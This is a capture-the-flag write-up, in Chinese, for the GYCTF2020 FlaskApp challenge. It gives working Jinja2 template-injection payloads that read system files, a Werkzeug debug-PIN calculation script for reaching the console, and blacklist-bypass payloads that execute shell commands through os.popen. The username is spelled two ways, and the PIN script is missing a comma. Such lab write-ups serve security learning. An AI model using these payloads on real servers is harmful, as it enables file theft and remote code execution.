[GYCTF2020]FlaskApp 1

最新推荐文章于 2024-07-31 11:47:44 发布

白初&

最新推荐文章于 2024-07-31 11:47:44 发布

阅读量798

点赞数 20

分类专栏： CTF-web-wp 文章标签： python flask web安全

本文链接：https://blog.csdn.net/ubaichu/article/details/140401784

版权

CTF-web-wp 专栏收录该内容

19 篇文章 0 订阅

订阅专栏

题目

在这里插入图片描述

有三个界面，base64加解密和提示界面
题目是flask，可能是ssti模板注入
加密窗口分别输入：{{7+7}}，解密窗口输入：e3s3Kzd9fQ== ({{7+7}}的base64编码)
解密窗口存在模板注入
读取文件内容（将payload base64加密后输入解密窗口）

payload:{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}{% endif %}{% endfor %}

在这里插入图片描述

def waf(str):
    black_list = [&#34;flag&#34;,&#34;os&#34;,&#34;system&#34;,&#34;popen&#34;,&#34;import&#34;,&#34;eval&#34;,&#34;chr&#34;,&#34;request&#34;, &#34;subprocess&#34;,&#34;commands&#34;,&#34;socket&#34;,&#34;hex&#34;,&#34;base64&#34;,&#34;*&#34;,&#34;?&#34;]
    for x in black_list :
        if x in str.lower() :
        return 1

可得到waf函数，过滤了flag、os等

当在解密窗口输入非base64值时，会报错，说明开启了debug模式，我们可以计算pin码，利用pin码进入debug模式的交互式命令行进行命令的执行
同时可以得到文件路径
在这里插入图片描述

解法1

pin码计算方式

在这里插入图片描述

pin码六个参数寻找方式
1.username 在/etc/passwd
2.modname 默认flask.app
3.appname 默认Flask
4.moddir flask库下app.py的绝对路径,可以通过报错拿到,如传参的时候给个不存在的变量
5.uuidnode mac地址的十进制,任意文件读 /sys/class/net/eth0/address
6.machine_id 机器码
    docker：/proc/self/cgroup
    linux：/etc/machine-id

本题pin码计算

username：faskweb

payload: {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/etc/passwd','r').read() }}{% endif %}{% endfor %}

在这里插入图片描述
moddir：/usr/local/lib/python3.7/site-packages/flask/app.py
已经通过报错信息得到路径

uuidnode：143851710825300
先获得mac地址（16进制）

payload: {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/sys/class/net/eth0/address','r').read() }}{% endif %}{% endfor %}

在这里插入图片描述
删掉冒号，转为10进制

machine_id：1408f836b0ca514d796cbf8960e45fa1

payload: {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/etc/machine-id','r').read() }}{% endif %}{% endfor %}

在这里插入图片描述

pin码计算脚本

用大佬写的脚本计算pin

import hashlib
from itertools import chain
probably_public_bits = [
    'flaskweb'# username
    'flask.app',# modname
    'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]

private_bits = [
    '143851710825300',# str(uuid.getnode()),  /sys/class/net/ens33/address
    '1408f836b0ca514d796cbf8960e45fa1'# get_machine_id(), /etc/machine-id
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

得到pin：134-391-017
访问/console，输入刚才计算出得pin码，进入控制台
在这里插入图片描述
在控制台寻找flag
（注意，记得删除文件名前的n）

解法二

将字符串倒转输出：txt.galf_eht_si_siht/’[::-1]

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('txt.galf_eht_si_siht/'[::-1],'r').read() }}{% endif %}{% endfor %}

解法三

字符串拼接

payload:{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %}   {% for b in c.__init__.__globals__.values() %}   {% if b.__class__ == {}.__class__ %}     {% if 'eva'+'l' in b.keys() %}       {{ b['eva'+'l']('__impor'+'t__'+'("o'+'s")'+'.pope'+'n'+'("cat /this_is_the_fl'+'ag.txt").read()') }}     {% endif %}   {% endif %}   {% endfor %} {% endif %} {% endfor %}